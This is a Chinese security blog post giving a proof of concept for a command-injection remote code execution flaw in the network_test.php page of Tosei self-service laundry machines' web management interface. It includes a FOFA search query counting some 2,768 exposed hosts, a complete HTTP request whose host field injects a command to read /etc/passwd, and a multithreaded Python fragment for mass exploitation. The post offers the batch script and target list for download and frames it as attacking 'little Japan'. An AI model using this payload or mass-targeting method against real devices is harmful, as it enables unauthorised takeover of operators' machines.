查看原文
其他

Tosei 自助洗衣机 network_test.php RCE漏洞【附POC】

ChinaRan404 知攻善防实验室 2024-01-27

关注本公众号,长期推送技术文章

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

简介

Tosei 自助洗衣机是小日子 Tosei 公司的一个产品。

漏洞概述

Tosei 自助洗衣机 web 管理端存在安全漏洞,攻击者利用该漏洞可以通过 network_test.php 的命令执行,在服务器任意执行代码,获取服务器权限,进而控制整个服务器。

资产

fofa:body="tosei_login_check.php"

2,768 条匹配结果 ( 2,370 条独立IP )

漏洞复现

POST /cgi-bin/network_test.php HTTP/1.1

Host: your-ip

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

host=%0acat${IFS}/etc/passwd%0a&command=ping

使用Yakit或Burp发送数据包

往下滑是命令执行结果

这里以输出/etc/passwd为例。

批量测试

集合python脚本,可实现对小日子进行批量RCE

可以看到,几乎所有是存在漏洞的

with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor: executor.map(check_vulnerability, targets)

更改max_workers即可更改线程池数量

脚本获取方式:后台回复"小日子"即可获取

资产获取方式:后台回复"小日子"即可获取

后台回复"交流群"获取技术交流群链接


往期精彩:

蓝队应急响应工具箱使用手册

EasyCVR 视频管理平台存在用户信息泄露[附批量POC]

渗透测试-JavaScript 利器整理

蓝队应急响应工具箱-v8-新春贺岁版

最新爆改自用python免杀-v3(绕过主流杀软机制)



继续滑动看下一个

Tosei 自助洗衣机 network_test.php RCE漏洞【附POC】

向上滑动看下一个

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存